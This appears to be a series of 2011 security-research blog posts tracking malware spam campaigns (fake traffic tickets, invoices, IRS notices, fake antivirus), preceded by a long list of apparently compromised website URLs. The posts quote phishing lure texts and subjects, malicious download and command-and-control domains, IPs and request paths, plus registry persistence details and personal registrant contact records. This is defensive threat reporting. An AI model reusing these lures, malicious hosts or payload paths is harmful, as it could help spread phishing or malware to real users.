weightlosspersonaltrainerconsulting.com /1decnf9.html
vandieautomatisering.nl /linhe.html
intestinoirritable.ws /e66uc.html
fmwwrestling.us /gsld0d.html
abeauty.com.au /
sokullupasahotel.com /fvn4upi.html
ants.net.au /yxe4ma.html
lkco.in /a8l876j.html
static-64-184-73-69nocdirect.com /~afroland/eh8jvre.html
damarchesi.it /6m2rdlx.html
trinity-work-shop.de /5t5ub.html
mycountylink.com /f6atze.html
artigianatopasella.com /9ghy.html
ohtobeyoungagain.com /t4cj.html
syedaliahmad.com /3mlnfh.html
www.geelongeisteddfod.com.au /13pspj.html
www.tommysparger.com /ci87qyp.html
nt-ves.ac.th /
diipbmis.nl /l374dcthtml
bakulpharma.com /
etno-plants.ro /
professionalroofingco.uk /vmba.html
altiaproducts.com /29f4.html
dezoetezaak.nl /anxl5.html
ozurfa.com.tr /ras5.html
lexxstore.de /7nsenqhtml
meirmodiin.org /~meirm/kk22.html
siflindia.com /27swn2.html
grapediscounts.com /fjlj9k.html
fastincomebiz.com /hsd6g7b.html
thebeadrotisserie.com /vel42.html
46.23.64.241 /~jamias/lc50sf.html
fastincomesystem.biz /u8g4tn.html
surebg.co.za /xltlgs.html
110.4.42.93 /bx94l.html
www.resourceelementlimited.com /
graph2profit.com /utxfc.html
shriganpatiproduction.net /r05qv4h.html
micrene.com /ivowl1rhtml
pdscientific.com /tl1s.html
www.wanithai.com /u7pv30b.html
ads-protection.com /fs3lax.html
sl3-vgt.vgthosting.com /~worknetw/fj2bvn.html
fb.servatusdev.com /~servdev/56iy2.html
hedy-lamarr.org /n2tgsb.html
niritech.com /pxkf.html
212.68.54.148 /~radyoruz/qsdsw9m.html
www.pushtiieshakti.com /783i.html
empiresallies-secrets.com /k0bayr.html
tarjetaspilos.com /9tvd.html
voongo.com /asfti1/index.html
searchtroop.net /04sh.html
altagallura.it /bd5jhtml
gran-mar.com.ar /4p6sbu7.html
fullart.com.pe /3c55egr.html
sanianishtar.info /7o2dd.html
umtelecom.com /h10krhtml
reformasyreparaciones.com /76kdp.html
206.217.196.47 /~dumpsche/kes773.html
acumenauditors.com.au /vfa9.html
www.rippt.com /t8859u.html
trunghieu.com /hsx1n3r.html
delallosa.com /mtgy99y.html
lainformacion.us /snkk1.html
refritermo.com /j9ps4y.html
www.grahajodoh.com /bqe6zk.html
etakip.com /yg4jl9.html
carifind.com /t718xhhtml
jpvarleyllc.com /kna4wx.html
www.shatteredhope.gr /lnsp.html
autoblog.fastincomesystem.biz /~cheers/gyjde.html
reformhaus-mehnert.de /2vn9yr5.html
indianbookshop.co.in /5b9fgs.html
host272.hostmonstercom /~fdflockc/6xh9l1e.html
enbramex.com /mpvsgi2.html
onlinesurat.com /mb2d.html
surrealtopia.com /hmsuu.html
el-salto-fishing.com /agg0noo.html
simplefact.mx /xln290.html
bofco.in /htrc.html
iznillahcng.com /y5le.html
static-64-184-73-69.nocdirect.com /~afroland/eh8jvre.html
vizonix.com /c1ptwqs/index.html
visionciudadconsultores.com /dwqopc/index.html
winsbyinc.com /0sm9j5/index.html
www.tradehalls.com /8eeh2.html
4income-solutions.com /93e3x.html
locanda-stazzo-bona.com /
jade.nseasy.com /~manishar/7xl9bd.html
GUHDNS.COM /md8g.html
livedata.it /ssao.html
www.manojengg.com /scv2.html
sexshop.com.tr /3igtv8.html
perfumeylenceria.com /joiwku.html
server10.namecheaphosting.com /
freunde-klinik-ottobeuren.de /oryh1.html
floristeriasdecoaromascostarica.com /kh31.html
portalinternational.us /5ecf2z.html
molinas.eu /nz4ot.html
clubfirst.org /2ba0jra.html
thepentad.com /eg3eje/index.html
www.dsmodular.com /qt21ta.html
hotelmarinepalace.com /0493.html
teresita.com.mx /hcrji4t.html
198.63.48.81 /z116c.html
punjnud.com /3sllgkihtml
inkostudio.com /y0ao0c.html
tuncakyavas.com /jfifrpb.html
hkf.huber-babenhausen.de /xyy4dg3.html
watson.timeweb.ru /~kostos/7euyd25.html
vscreative.com /x882.html
lemilano.fr /
labeltula.it /e51rsq.html
www.acclaimcabinets.com.au /
shelterpropertydealers.com /97qf.html
dotmile.com /cvpa4jj.html
www.clubbayard.com /w6kzi.html
myauto.co.nz /odmz0chtml
whydodogs.org /jdab40.html
bigrace2012.com /3ri1vt.html
www.launas-hebergement.com /fj9p1.html
www.neoplastic.gr /0qedzw.html
ittefaqpipe.com /2inp.html
efficientorganizationnw.com /ix84c.html
indosyslife.com /cdwwto.html
newmonicaarts.org /
avicarusa.com /uyxasjr.html
atlantidesardegna.it /61fyvx.html
baratrucks.com /n6j5m.html
heromw.com /602ka.html
web3.biz /4jdsydk.html
eqsync.com /bx5wfm.html
weblinksubmissions.com /1bgypq/index.html

{ Comments on this entry are closed }

New York City "Uniform Traffic Ticket" tops spammed malware

by UAB's Director of Research in Computer Forensics on August 17, 2011

in SBN

Email attachments that contain malicious code are still being used to infect computers and steal the data found on those computers. While it is easy to find people who discount this threat, believing no one would be foolish enough to open one of these email attachments, the criminals are working hard to make their approaches more convincing.

Today we've seen more than 11,000 copies of their newest attempt come in to the UAB Spam Data Mine. The email received looks like this:



The email contains several falsified header indicators, including at the most basic level that it claims to come from "@nyc.gov". In addition to this, however, there has been a "Received:" tag added to make it appear to have originated from a legitimate New York City IP address:

Received: from nyc.gov ([167.153.240.51]) by xx.xx.xx.xx; Wed, 03 Aug 2011 12:20:46 +0530

The City of New York is the registrant for every IP address beginning with "167.153.*.*" - in fact 167.153.240.51 is the IP address of the website "nyc.gov" where Mayor Bloomberg's homepage can be found.

The other false information is the date. Both the date in the Received: tag and the date in the "Date:" tag have been falsified to make it seem this email has been in your in box for several days by the time you see it.

Just from the falsified header, we would predict that this email is going to be in the same family of malware as the "IRS Notification" and "UPS Notification" emails seen earlier this week, which also contained falsified Received: tags.

The zip file contains an executable file disguised as a PDF file:



When the malware is launched, it connects to "sfkdhjnsfjg.ru" on 195.189.226.117.

from there it fetches "/ftp/g.php" and "pusk3.exe" -- exactly the same as the IRS Notification spam and the UPS Notification spam.

VirusTotal Report


Another group of spam messages this morning pretends to be a notice that you have received money via Western Union.

The attachment is of course a virus:

VirusTotal Report.

Money Transfer Information
MONEY TRANSFER INFORMATION
Money Transfer Information 00375
Money Transfer Notice
MONEY TRANSFER NOTICE
MONEY TRANSFER NOTICE 06457
Western Union: Money Transfer For You
WESTERN UNION: MONEY TRANSFER FOR YOU
Western Union: Remittance Advice
WESTERN UNION: REMITTANCE ADVICE
Western Union: Transfer Of Money
WESTERN UNION: TRANSFER OF MONEY
Western Union: You Have Money Transfer
WESTERN UNION: YOU HAVE MONEY TRANSFER
Western Union: You have received a money transfer
WESTERN UNION: YOU HAVE RECEIVED A MONEY TRANSFER



Another top spammed malware attachment today delivers emails with these subjects:

Re: End of July Statement Required
Re: FW: End of July Stat.
Re: FW: End of July Statement
Re: FW: End of July Statement required
Re: FW: End of July Statement Required
Re: FW: End of July Statement REquired
Re: FW: End of July Statement REquired!
Re: FW: End of July Stat. required
Re: FW: End of July Stat. Required

The email body says simply:

Hallo,
As requested i give you open Invoices issued to you as per 5th Aug. 2011
Regards
DEENA BUCKLEY


Here's the VirusTotal report for this one.


{ Comments on this entry are closed }

Inter-company Invoice spam leads to Malware

by UAB's Director of Research in Computer Forensics on August 10, 2011

in SBN

This morning we are seeing a new spam campaign in the UAB Spam Data Mine. Volumes are still low, but the count is rising steadily, and the detection so far is horrible. When I started writing this post we had seen 710 copies. It's now up to 1389 copies and counting!

count | mbox
-------+---------------------
1 | 2011-08-10 05:45:00
6 | 2011-08-10 06:00:00
3 | 2011-08-10 06:15:00
85 | 2011-08-10 06:30:00
1 | 2011-08-10 06:45:00
3 | 2011-08-10 07:00:00
1 | 2011-08-10 07:15:00
301 | 2011-08-10 07:30:00
252 | 2011-08-10 07:45:00
260 | 2011-08-10 08:00:00
247 | 2011-08-10 08:15:00
229 | 2011-08-10 08:30:00
(12 rows)


The spam pretends to be an invoice from a random company. So far this morning we've seen spam claiming to be an invoice from:

Aleris International Corp.
AMR Corporation Corp.
Anic Corp.
Arch Coal Corp.
ATFT Corp
Beazer Homes USA Corp.
Boyd Gaming Corp.
Brookdale Senior Living Corp.
Hyland Software Corp.
KPMG Corp.
Kraft Foods Corp.
Miltek Corp.
Novellus Systems Corp.
OSN Corp.
PDC Corp.
Safeco Corporation Corp.
WLC Corp.

Subject can be:

Re: Fw: Inter-company inv. from (company)
Re: Fw: Inter-company inv. from (company)
Re: Fw: Inter-company invoice from (company)
Re: Fw: Intercompany invoice from (company)
Re: Fw: Corp. invoice from (company)

A couple example emails follow:


Hi
Attached the inter-company inv. for the period January 2010 til December 2010.

Thanks a lot for support setting up this process.

CHERYL Flowers
Kraft Foods Corp.


Hi

Attached the inter-company inv. for the period January 2010 til December 2010.
Thanks a lot

Asher GIFFORD
Anic Corp.


Good day


Attached the intercompany invoice for the period January 2010 til December 2010.

Thanks a lot for supporting this process
MAYOLA LEARY
Aleris International Corp.



The attachment may be named "Intinvoice" or "Invoice" followed by an underscore, a date, and an "invoice number" ".zip" such as:

Intinvoice_08.6.2011_2222341965.zip
or
Intinvoice_08.4.2011_Q167829.zip
or
Invoice_08.6.2011_T40099.zip


We've seen 1300+ copies so far in the UAB Spam Data Mine, and I have 15 in my personal email.

So far, all have had the same attachment MD5, which yields a 6 of 43 detection rate on this VirusTotal Report.

So far everyone is just saying it is "Suspicious" or "Generic" ... which is our invitation to infect ourselves and figure out what it does!

When we launched the malware, we made a connection to "armaturan.ru" on 94.199.48.152.

We also talked to "ss-partners.ru" on 77.120.114.100
and to "ledinit.ru" on 78.111.51.121

The connection to armaturan.ru did:

GET /forum/dl/ots.php?seller=4&hash={8FA33B0C-3F04-405B-83BD-1CD82D298FF2}

which seems to be uniquely registering our machine, and giving seller #4 credit for my infection?

From ss-partners.ru we fetched a file:

GET /dump/light.exe

which dropped an approximately 70k file onto our local machine.

Then we went back to armaturan.ru and sent another get:

GET /forum/dl/getruns.php?seller=4&hash={8FA33B0C-3F04-405B-83BD-1CD82D298FF2}&ahash=5895b2509324d6a17b2b6ea09859a485

Any bets on whether that ahash is the MD5 of the file I just downloaded?

Looks like I just reported back to the C&C that I successfully downloaded and installed malware with that MD5.

At this point I checked my registry and found that I had a new Run command for next time I restart. I'm supposed to run:

C:\Documents and Settings\Administrator\Application Data\3B1F8DC4\3B1F8DC4.EXE

Odd, I don't recall having a file named that?

Actually, we confirmed that this is the file that was downloaded as "light.exe" above. The VirusTotal report shows only 4 of 43 infection reports for this file as well. See VirusTotal Report.

Unfortunately, it disproves my MD5 theory. This is NOT the "ahash" value. This file's MD5 is f58d5cbb564069eca8806d4e48d7a714.

Launching the second file caused the machine to open an SSL tunnel to 78.111.51.121 and then sit idle.

You may recognize that as the IP address for "ledinit.ru" earlier, but it didn't make a connection by name. It went straight for the IP address. If that IP sounds familiar, it's probably because there have been many other malware campaigns tied to the network "Azerbaijan Baku Sol Ltd", but I'm sure that's just because it's a very large network.

78.111.51.100 is currently hosting three live Zeus C&C servers. Surely a coincidence.

fileuplarc.com
hunterdriveez.com
asdfasdgqghgsw.cx.cc

I'll email the owner and get those taken down right away! (smirk)

-----------

person: Vugar Kouliyev
address: 44, J.Jabbarli str., Baku, Azerbaijan
mnt-by: MNT-SOL
e-mail: vugar@kouliyev.com
phone: +994124971234
nic-hdl: VK1161-RIPE
source: RIPE # Filtered

route: 78.111.48.0/20
descr: SOL ISP
origin: AS43637
mnt-by: MNT-SOL
source: RIPE # Filtered

route: 78.111.51.0/24
descr: SOL ISP
origin: AS43637
mnt-by: MNT-SOL
source: RIPE # Filtered

----------------

Armaturan.ru on 94.199.48.152 also has a sordid history.

That IP address, in Hungary, has been associated with at least two active SpyEye domains: hdkajhslalskjd.ru and hhasdalkjjfasd.ru

I suppose we'll have to ask Mr. Zsolt nicely if he would remove those domains.

person: Zemancsik Zsolt
address: Victor Hugo u. 18-22.
address: 1132 Budapest
address: Hungary
phone: +36 203609059
e-mail: darwick@cyberground.hu
nic-hdl: DARW-RIPE
mnt-by: DARW-MNT
source: RIPE # Filtered

route: 94.199.48.0/21
descr: Originated from 23VNet Network
origin: AS30836
mnt-by: NET23-MNT
source: RIPE # Filtered

========
ss-partners.ru is on servers from Bellhost.ru, a customer of Volia DC

person: Volia DC Admin contact
address: Ukraine, Kiev, Kikvidze st. 1/2
phone: +38 044 2852716
abuse-mailbox: abuse@dc.volia.com
nic-hdl: VDCA-RIPE
mnt-by: VOLIA-DC-MNT
source: RIPE # Filtered

route: 77.120.96.0/19
descr: Volia more specific route
origin: AS25229
mnt-by: VOLIA-MNT
mnt-lower: VOLIA-MNT
source: RIPE # Filtered


{ Comments on this entry are closed }

Fake IRS emails continue to spread Gov-related Zeus

by UAB's Director of Research in Computer Forensics on August 5, 2011

in SBN

We've already seen nearly 500 copies of the new Government-related Zeus spam campaign so far this morning in the UAB Spam Data Mine. As has been typical in this campaign that we first started tracking on July 13th, the detection has been fairly horrible each morning for the new malware version. We lasted updated on this malware on July 29th in our story Government-related Zeus Spam Continues.

Today's version advertises the domain "tax-irs-report.com" and asks users to download the file 0000770950077US.pdf.exe from that site.

190 different computers have sent us the spam for this campaign so far today. 118 of them from the USA, 40 from India.

When we asked the UAB Spam Data Mine what other virus links we had been sent by this same group of 190 computers on other days, we got this list:

receiving_date | machine | path
----------------+------------------------------+-------------------------------
2011-07-13 | usbanking-security.com | /tax_report.pdf.exe
2011-07-15 | federalsecusrity.com | /pending-taxes.pdf.exe
2011-07-19 | irs-report-link.com | /tax-report.pdf.exe
2011-07-19 | irs-taxes-report.com | /tax-report.pdf.exe
2011-07-19 | taxreport-irs.com | /tax-report.pdf.exe
2011-07-20 | alerts-federalresrve.com | /rejected_wire.pdf.exe
2011-07-20 | nacha-alert.com | /rejected_transaction.pdf.exe
2011-07-20 | nacha-alert.org | /rejected_transfer.pdf.exe
2011-07-20 | reports-federalreserve.com | /rejected_wire.pdf.exe
2011-07-21 | national-security-agency.com | /blocked_list.exe
2011-07-21 | national-security-agency.com | /token_security_update.exe
2011-07-21 | nsa-security.net | /blocked-list.exe
2011-07-21 | nsa-security.net | /token_security_update.exe
2011-07-22 | irs-downloads.com | /00000700955160US.exe
2011-07-22 | irs-files.com | /00000700955170US.exe
2011-07-26 | irs-alert.com | /00000700955770US.exe
2011-07-27 | nacha-transactions.org | /304694305894903.pdf.exe
2011-07-27 | taxes-refund.com | /00000700975770US.exe
2011-07-27 | www.nacha-rejected.com | /304694305894903.pdf.exe
2011-07-28 | fdic-updates.com | /system_update_07_28.exe
2011-07-29 | federalreserve-alert.com | /transaction_report.pdf.exe
2011-07-29 | taxes-security.com | /00000700955060US.pdf.exe
2011-08-03 | irs-report.com | /00000770950077US.exe
2011-08-05 | tax-irs-report.com | /0000770950077US.pdf.exe
(24 rows)

So, at least some of today's spamming computers have been with this campaign since the beginning (July 13th).

When today's malware is executed it sets a registry key in "HKEY_USERS\S-1-5(my user)-500\Software\Microsoft\Windows\CurrentVersion\Run" to relaunch itself from my current user account where it had copied itself as "C:\Documents and Settings\Administrator\Application Data\Afena\iror.exe"

It makes connection to domains generated with a DGA (Domain Generation Algorithm). Today's live domain was:

olojkpcltulirqr.info on 50.57.71.39

from there it did a GET for /news/?s=158404

It tried many other domains, but none of the others were live. Some of them include:

jruioljslsitjpfv.biz
wlnzkqmohuhzqyra.info
tjjhmtjlziebo.net
jpkpbxkoxwijzijr.info

As we have seen before, the malware ALSO fetches a copy of "heap_v206_mails.exe" after it successfully installs itself.

The spam started at 4:45 AM (Central time), peaked at 5:15, and then began to trickle off. (We group in 15 minute windows.)

count | 15 minute spam block
-------+---------------------
3 | 2011-08-05 04:45:00
3 | 2011-08-05 05:00:00
406 | 2011-08-05 05:15:00
86 | 2011-08-05 05:30:00
(4 rows)

This morning's malware is largely undetected:

A VirusTotal Report shows 6 of 43 AV products know that this is a virus.

I have to praise Microsoft for being the only one of the six to correctly call this Zeus (Zbot).

Email subjects we've seen on this morning's campaign:

count | subject
-------+-------------------------------------------------------------------
38 | Change Confirmation
4 | Does your company is registered outstanding tax debt
5 | Does your company is registered tax debt
1 | Does your enterprise including unpaid tax debts
1 | Does your enterprise listed outstanding tax debts
1 | Does your enterprise listed unpaid tax debts
30 | Federal Tax payment rejected
1 | For your company including unpaid tax debts
1 | For your company is registered outstanding tax debts
1 | For your company is registered tax debts
1 | For your company is registered unpaid tax debt
1 | For your company listed tax debts
2 | For your enterprise listed tax debt
70 | Internal Revenue Service
24 | Internal Revenue Service (IRS)
19 | Internal Revenue Service United States Department of the Treasury
32 | IRS.gov
31 | IRS.gov US
19 | Notice of Underreported Income
35 | Payment IRS.gov
50 | Support IRS.gov
40 | Treasury Inspector General for Tax Administration
42 | U.S. Department of the Treasury
1 | Your company including outstanding tax debts
1 | Your company including tax debts
1 | Your company listed outstanding tax debt
2 | Your company listed tax debts
1 | Your enterprise including outstanding tax debts
2 | Your enterprise is registered unpaid tax debts
1 | Your enterprise listed outstanding tax debt
1 | Your enterprise listed unpaid tax debt
39 | Your IRS payment rejected
(32 rows)


A mix and match of sender name, sender-username, and sender-domain creates the from addresses:

count | sender_name
-------+---------------------------------------------------------------------
19 | "Internal Revenue Service"
18 | "Internal Revenue Service (IRS)"
27 | "Internal Revenue Service (IRS.gov)"
29 | "Internal Revenue Service United States Department of the Treasury"
23 | "Internal Revenue Service US Department of the Treasury"
29 | "IRS.gov"
18 | "IRS.gov United States Department of the Treasury"
30 | "IRS.gov US"
22 | "IRS.gov US Department of the Treasury"
21 | "IRS United States Department of the Treasury"
41 | "Payment IRS.gov"
37 | "Support IRS.gov"
23 | "The Consumer Financial Protection"
37 | "Treasury Inspector General for Tax Administration"
30 | "United States Department of the Treasury"
19 | "U.S. Department of the Treasury"
23 | "US_IRS"
17 | "USIRS"
35 | "US IRS.gov"


count | sender_username
-------+--------------------------
12 | admin
8 | adminnistration
9 | alerts
16 | cunsumer
29 | delivery
15 | e-file
10 | finance
33 | frboard-webannouncements
36 | govdelivery
26 | info
17 | information
14 | inspector
8 | internal_revenue_service
30 | Internal_Revenue_Service
18 | irs
6 | news
14 | news-alerts
8 | no-reply
28 | privacy_policy
22 | protection
5 | public
5 | report
9 | service
17 | stats
22 | subscriber
12 | subscriptions
13 | support
13 | usirc
14 | USIRS
13 | usttb
16 | webannouncements
(31 rows)

count | sender_domain
-------+-------------------
93 | antifraud.irs.gov
73 | info.irs.gov
78 | irs.gov
91 | irs.security.gov
73 | irs.taxes.gov
90 | service.irs.gov
(6 rows)

{ Comments on this entry are closed }

Love Map Spam spreads Fake AV

by UAB's Director of Research in Computer Forensics on August 3, 2011

in SBN

The top malware spam of the morning is another Fake Antivirus product, but as you'll see in today's story, its a very familiar Fake AV product.

About 1/2 of 1% of the spam we've seen this morning is a new campaign spreading a fake antivirus dropper. The malware has a fair detection rating, with 17 of 43 AV products detecting the malware according to VirusTotal in their report for MD5 = 635aceafb9ee4236e50e7d0f6c7a7895.

The email bodies use some random misspellings, but look something like this:


WELCOME S'EXOHOLIC!
Are YOU real Se'X-tourist?
Check ->>NEW PROJECT: WORLD MAP OF PUSSY
With Best Wishes ...
www. love-map .com



and then have an attachment, which is the malware.


(the website, love-map.com, doesn't actually exist...)

The attachment filename is "map_of_love###.zip" where ### is a random number of length between 4 and 8 characters.

Thanks to the UAB Spam Data Mine, it's fairly easy for us to link this new Fake AV spam campaign to previous ones. For example -- we've seen 520 distinct sending IP addresses so far this morning, so let's ask "What was the most common email subject that those same sending IP addresses sent us yesterday?"

43 of the IP addresses sent us an email yesterday with the subject "Your credit card is blocked"

33 sent us "Your credit card has been blocked"

That's the same campaign we've been seeing since we wrote about it on July 23rd (See: MasterCard Spam Leads to Fake AV.

The other big fake AV campaign from yesterday was one pretending to be the US Postal Service. We saw 814 copies of that spam yesterday, and 154 of them came from computers that also sent us today's "Love Map" malware.

The USPS subjects were like:

DELIVERY CONFIRMATION FROM USPS 0785164
From USPS 0735590
USPS Attention 03867076
USPS: DELIVER CONFIRMATION - FAILED 1399475
USPS Delivery Confirmation 1784864
USPS id. 167163
Your USPS id. 12286791

With random upper and lowercasing, and random numbers in each subject.

Here's a VirusTotal report on yesterday's USPS Fake AV, which had MD5 = a9a01f061d336774276fabb1827b91cc

How closely related are the "MasterCard" fake AV and the USPS fake AV? Well, they are actually IDENTICAL. Its the same Malware. Here's a report extract from yesterday showing the email subject and the MD5 of the attached malware:

Your credit card is blocked | a9a01f061d336774276fabb1827b91cc
Your credit card has been blocked | a9a01f061d336774276fabb1827b91cc
Your credit card is blocked | a9a01f061d336774276fabb1827b91cc
Your credit card is blocked | a9a01f061d336774276fabb1827b91cc
Your credit card has been blocked | a9a01f061d336774276fabb1827b91cc
Your credit card is blocked | a9a01f061d336774276fabb1827b91cc
Your credit card is blocked | a9a01f061d336774276fabb1827b91cc
Your credit card is blocked | a9a01f061d336774276fabb1827b91cc
Your credit card has been blocked | a9a01f061d336774276fabb1827b91cc
Your credit card has been blocked | a9a01f061d336774276fabb1827b91cc
Your credit card has been blocked | a9a01f061d336774276fabb1827b91cc
Your credit card is blocked | a9a01f061d336774276fabb1827b91cc
Your credit card is blocked | a9a01f061d336774276fabb1827b91cc
Your credit card is blocked | a9a01f061d336774276fabb1827b91cc
Your credit card is blocked | a9a01f061d336774276fabb1827b91cc
Your credit card has been blocked | a9a01f061d336774276fabb1827b91cc
From USPS 38864359 | a9a01f061d336774276fabb1827b91cc
USPS DELIVERY CONFIRMATION 954859 | a9a01f061d336774276fabb1827b91cc
From USPS 8815572 | a9a01f061d336774276fabb1827b91cc
DELIVERY CONFIRMATION FROM USPS 6498394 | a9a01f061d336774276fabb1827b91cc
DELIVERY CONFIRMATION FROM USPS 73687208 | a9a01f061d336774276fabb1827b91cc
USPS DELIVERY CONFIRMATION 56547166 | a9a01f061d336774276fabb1827b91cc
USPS ATTENTION 578975 | a9a01f061d336774276fabb1827b91cc
USPS: DELIVER CONFIRMATION - FAILED 9211453 | a9a01f061d336774276fabb1827b91cc
From USPS 5174072 | a9a01f061d336774276fabb1827b91cc
USPS Attention 1201554 | a9a01f061d336774276fabb1827b91cc
Your USPS id. 92444941 | a9a01f061d336774276fabb1827b91cc
DELIVERY CONFIRMATION FROM USPS 575555 | a9a01f061d336774276fabb1827b91cc
Your USPS id. 82259351 | a9a01f061d336774276fabb1827b91cc
Your USPS id. 139017 | a9a01f061d336774276fabb1827b91cc
Your USPS id. 381458 | a9a01f061d336774276fabb1827b91cc
From USPS 3877947 | a9a01f061d336774276fabb1827b91cc
USPS id. 45254864 | a9a01f061d336774276fabb1827b91cc

OK, back to today . . .

Here are the "Love Map" spam subject lines we've seen it use so far:


BABECITIES IN WORLD 2011
BABEPLACES IN WORLD 2011
BABIESPLACES IN WORLD 2011
BABIESSPOTS IN WORLD 2011
BABYCITIES IN WORLD 2011
BABYSPOTS IN WORLD 2011
GIRLSCITIES IN WORLD 2011
GIRLSPLACES IN WORLD 2011
GIRLSSPOTS IN WORLD 2011
HOT BABE CITIES 2011
HOT BABE PLACES 2011
HOT BABE SPOTS 2011
HOT BABIES CITIES 2011
HOT BABIES SPOTS 2011
HOT BABY CITIES 2011
HOT BABY PLACES 2011
HOT BABY SPOTS 2011
HOT CITIES OF BABE 2011
HOTCITIES OF BABIES 2011
HOT CITIES OF BABY 2011
HOTCITIES OF BABY 2011
HOT CITIES OF GIRLS 2011
HOTCITIES OF GIRLS 2011
HOTCITIES OF PUSSY 2011
HOT GIRLS PLACES 2011
HOT GIRLS SPOTS 2011
HOT PLACES OF BABE 2011
HOT PLACES OF BABIES 2011
HOTPLACES OF BABIES 2011
HOT PLACES OF BABY 2011
HOTPLACES OF BABY 2011
HOT PLACES OF GIRLS 2011
HOTPLACES OF GIRLS 2011
HOT PLACES OF GIRLS IN WORLD
HOTPLACES OF GIRLS IN WORLD
HOT PLACES OF PUSSIES 2011
HOTPLACES OF PUSSIES 2011
HOT PLACES OF PUSSY 2011
HOTPLACES OF PUSSY 2011
HOT PUSSIES CITIES 2011
HOT PUSSIES SPOTS 2011
HOT PUSSY CITIES 2011
HOT PUSSY PLACES 2011
HOT PUSSY SPOTS 2011
HOT SPOTS OF BABE 2011
HOT SPOTS OF BABIES 2011
HOTSPOTS OF BABIES 2011
HOT SPOTS OF GIRLS 2011
HOTSPOTS OF GIRLS 2011
HOT SPOTS OF GIRLS IN WORLD
HOT SPOTS OF PUSSIES 2011
HOTSPOTS OF PUSSIES 2011
HOT SPOTS OF PUSSY 2011
HOTSPOTS OF PUSSY 2011
JULY-2011: BABECITIES IN WORLD
JULY-2011: BABEPLACES IN WORLD
JULY-2011: BABIESCITIES IN WORLD
JULY-2011: BABIESPLACES IN WORLD
JULY-2011: BABYCITIES IN WORLD
JULY-2011: BABYPLACES IN WORLD
JULY-2011: GIRLSPLACES IN WORLD
JULY-2011: GIRLSSPOTS IN WORLD
JULY-2011: HOT BABE CITIES
JULY-2011: HOT BABE PLACES
JULY-2011: HOT BABE SPOTS
JULY-2011: HOT BABIES CITIES
JULY-2011: HOT BABY CITIES
JULY-2011: HOT BABY PLACES
JULY-2011: HOT BABY SPOTS
JULY-2011: HOT CITIES OF BABE
JULY-2011: HOTCITIES OF BABE
JULY-2011: HOTCITIES OF BABIES
JULY-2011: HOT CITIES OF BABY
JULY-2011: HOTCITIES OF BABY
JULY-2011: HOT CITIES OF GIRLS
JULY-2011: HOTCITIES OF GIRLS
JULY-2011: HOT CITIES OF PUSSIES
JULY-2011: HOTCITIES OF PUSSIES
JULY-2011: HOT CITIES OF PUSSY
JULY-2011: HOTCITIES OF PUSSY
JULY-2011: HOT GIRLS PLACES
JULY-2011: HOT GIRLS SPOTS
JULY-2011: HOT PLACES OF BABE
JULY-2011: HOTPLACES OF BABE
JULY-2011: HOT PLACES OF BABIES
JULY-2011: HOTPLACES OF BABIES
JULY-2011: HOT PLACES OF BABY
JULY-2011: HOTPLACES OF BABY
JULY-2011: HOT PLACES OF GIRLS
JULY-2011: HOTPLACES OF GIRLS
JULY-2011: HOTPLACES OF PUSSIES
JULY-2011: HOT PLACES OF PUSSY
JULY-2011: HOTPLACES OF PUSSY
JULY-2011: HOT PUSSIES CITIES
JULY-2011: HOT PUSSIES PLACES
JULY-2011: HOT PUSSIES SPOTS
JULY-2011: HOT PUSSY CITIES
JULY-2011: HOT PUSSY PLACES
JULY-2011: HOT PUSSY SPOTS
JULY-2011: HOTSPOTS OF BABE
JULY-2011: HOT SPOTS OF BABIES
JULY-2011: HOTSPOTS OF BABIES
JULY-2011: HOT SPOTS OF BABY
JULY-2011: HOTSPOTS OF BABY
JULY-2011: HOT SPOTS OF GIRLS
JULY-2011: HOTSPOTS OF GIRLS
JULY-2011: HOT SPOTS OF PUSSIES
JULY-2011: HOTSPOTS OF PUSSIES
JULY-2011: HOT SPOTS OF PUSSY
JULY-2011: LOVE BABE CITIES
JULY-2011: LOVE BABE PLACES
JULY-2011: LOVE BABIES SPOTS
JULY-2011: LOVE BABY CITIES
JULY-2011: LOVE BABY PLACES
JULY-2011: LOVE BABY SPOTS
JULY-2011: LOVE CITIES IN WORLD
JULY-2011: LOVE CITIES OF BABE
JULY-2011: LOVECITIES OF BABE
JULY-2011: LOVECITIES OF BABIES
JULY-2011: LOVE CITIES OF BABY
JULY-2011: LOVECITIES OF BABY
JULY-2011: LOVECITIES OF GIRLS
JULY-2011: LOVE CITIES OF PUSSIES
JULY-2011: LOVECITIES OF PUSSIES
JULY-2011: LOVE CITIES OF PUSSY
JULY-2011: LOVECITIES OF PUSSY
JULY-2011: LOVE GIRLS CITIES
JULY-2011: LOVE GIRLS PLACES
JULY-2011: LOVE GIRLS SPOTS
JULY-2011: LOVE MAP OF BABE
JULY-2011: LOVE MAP OF BABIES
JULY-2011: LOVE-MAP OF BABIES
JULY-2011: LOVE-MAP OF BABY
JULY-2011: LOVE MAP OF GIRLS
JULY-2011: LOVE-MAP OF GIRLS
JULY-2011: LOVE MAP OF PUSSIES
JULY-2011: LOVE-MAP OF PUSSIES
JULY-2011: LOVE MAP OF PUSSY
JULY-2011: LOVE-MAP OF PUSSY
JULY-2011: LOVEPLACES IN WORLD
JULY-2011: LOVE PLACES OF BABE
JULY-2011: LOVEPLACES OF BABE
JULY-2011: LOVE PLACES OF BABIES
JULY-2011: LOVEPLACES OF BABIES
JULY-2011: LOVE PLACES OF BABY
JULY-2011: LOVEPLACES OF BABY
JULY-2011: LOVE PLACES OF GIRLS
JULY-2011: LOVEPLACES OF GIRLS
JULY-2011: LOVE PLACES OF PUSSIES
JULY-2011: LOVEPLACES OF PUSSIES
JULY-2011: LOVE PLACES OF PUSSY
JULY-2011: LOVE PUSSIES PLACES
JULY-2011: LOVE PUSSIES SPOTS
JULY-2011: LOVE PUSSY CITIES
JULY-2011: LOVE PUSSY PLACES
JULY-2011: LOVE SPOTS IN WORLD
JULY-2011: LOVESPOTS IN WORLD
JULY-2011: LOVE SPOTS OF BABE
JULY-2011: LOVESPOTS OF BABE
JULY-2011: LOVE SPOTS OF BABIES
JULY-2011: LOVE SPOTS OF BABY
JULY-2011: LOVE SPOTS OF GIRLS
JULY-2011: LOVESPOTS OF GIRLS
JULY-2011: LOVE SPOTS OF PUSSIES
JULY-2011: LOVESPOTS OF PUSSIES
JULY-2011: LOVE SPOTS OF PUSSY
JULY-2011: LOVESPOTS OF PUSSY
JULY-2011: PUSSYCITIES IN WORLD
JULY-2011: PUSSYPLACES IN WORLD
JULY-2011: SEXYCITIES IN WORLD
JULY-2011: SEXY LOVE MAP
JULY-2011: SEXY LOVE-MAP
JULY-2011: SEXY PLACES IN WORLD
JULY-2011: SEXYPLACES IN WORLD
JULY-2011: SEXYSPOTS IN WORLD
